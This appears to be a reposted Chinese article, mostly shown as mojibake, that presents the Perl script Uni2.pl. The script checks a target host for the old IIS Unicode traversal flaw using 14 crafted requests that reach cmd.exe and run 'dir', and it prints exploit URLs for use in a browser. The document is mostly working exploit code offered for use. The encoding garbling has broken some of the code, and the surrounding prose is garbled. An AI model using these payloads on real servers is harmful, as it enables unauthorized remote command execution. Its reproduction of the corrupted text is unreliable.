IIS UNICODE Bug

2¡¢±È½ÏÈ«ÃæµÄUNICODE¹¤¾ßUni2.pl
¡¡¡¡Ö»ÒªÖ§³ÖPERL£¬¾ÍÄܹ»ÀûÓÃÕ⹤¾ßÀ´¶ÔÄ¿±êÖ÷»ú½øÐÐUNICODE±àÂ멶´µÄɨÃè¡£¸Ã³ÌʽÄܹ»¶ÔÈκδæÔÚUNICODE±àÂ멶´µÄNT°æ±¾½øÐÐɨÃè²âÊÔ¡£ÒÔÏÂΪ¸ÃÈí¼þµÄÔ´³Ìʽ£¬¾ßÌåÈçºÎ²Ù×÷¾Í²»×öÖÜÏê½â˵ÁË
#!/usr/bin/perl
#
# Uni2.pl checks a host for the recent IIS unicode vulnerability
# in 14 different ways. Also gives you the browser URL for the
# exploit. Origionally Stealthmode316, modifications by Roeland
#
#
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-CHECK
Example: ./uni.pl www.target.com:80£Ün";}
#($host,$port)=split(/:/,@ARGV[0]);
($host = @ARGV[0]);
$port = 80;
$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..À¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 2
my @results=sendraw("GET /scripts..Áœ../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts..Áœ../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 3
my @results=sendraw("GET /scripts/..Á%pc../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á%pc../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 4
my @results=sendraw("GET /scripts/..À%9v../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..À%9v../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 5
my @results=sendraw("GET /scripts/..À%qf../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..À%qf../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 6
my @results=sendraw("GET /scripts/..Á%8s../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á%8s../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 7
my @results=sendraw("GET /scripts/..Á../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 8
my @results=sendraw("GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Áœ../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 9
my @results=sendraw("GET /scripts/..Á¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..Á¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 10
my @results=sendraw("GET /scripts/..à€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..à€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 11
my @results=sendraw("GET /scripts/..ð€€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..ð€€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 12
my @results=sendraw("GET /scripts/..ø€€€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..ø€€€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 13
my @results=sendraw("GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c dir HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c dir£Ün";}}
# ---------------test method 14
my @results=sendraw("GET /msadc/..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../winnt/system32/cmd.exe£Ü?/c£Ü dir HTTP/1.0£Ür£Ün£Ür£Ün
");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../..£Üà£Ü€£Ü¯../winnt/system32/cmd.exe£Ü?/c£Ü dir£Ün";}}
if ($flag!=1) {
print "$host: Not vulnerable£Ün";
exit;
}
sub sendraw {
$hbn = gethostbyname($host);
if ($hbn) {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,gethostbyname('tcp')||0) || die("Socket problems£Ün");
if(connect(S,pack "SnA4x8",2,$port,$target)) {
my @in;
select(S);
$|=1;
print $pstr;
while(){
push @in, $_;
}
select(STDOUT);
close(S);
return @in;
} else {
print "$host: Can't connect£Ün";
exit;
}
} else {
print "$host: Host not found£Ün";

ÎÄÕÂÕûÀí£ºÎ÷²¿ÊýÂë--רҵÌṩÓòÃû×¢²á¡¢ÐéÄâÖ÷»ú·þÎñ
http://www.west263.com
ÒÔÉÏÐÅÏ¢ÓëÎÄÕÂÕýÎÄÊDz»¿É·Ö¸îµÄÒ»²¿·Ö,Èç¹ûÄúҪתÔر¾ÎÄÕÂ,Çë±£ÁôÒÔÉÏÐÅÏ¢£¬Ð»Ð»!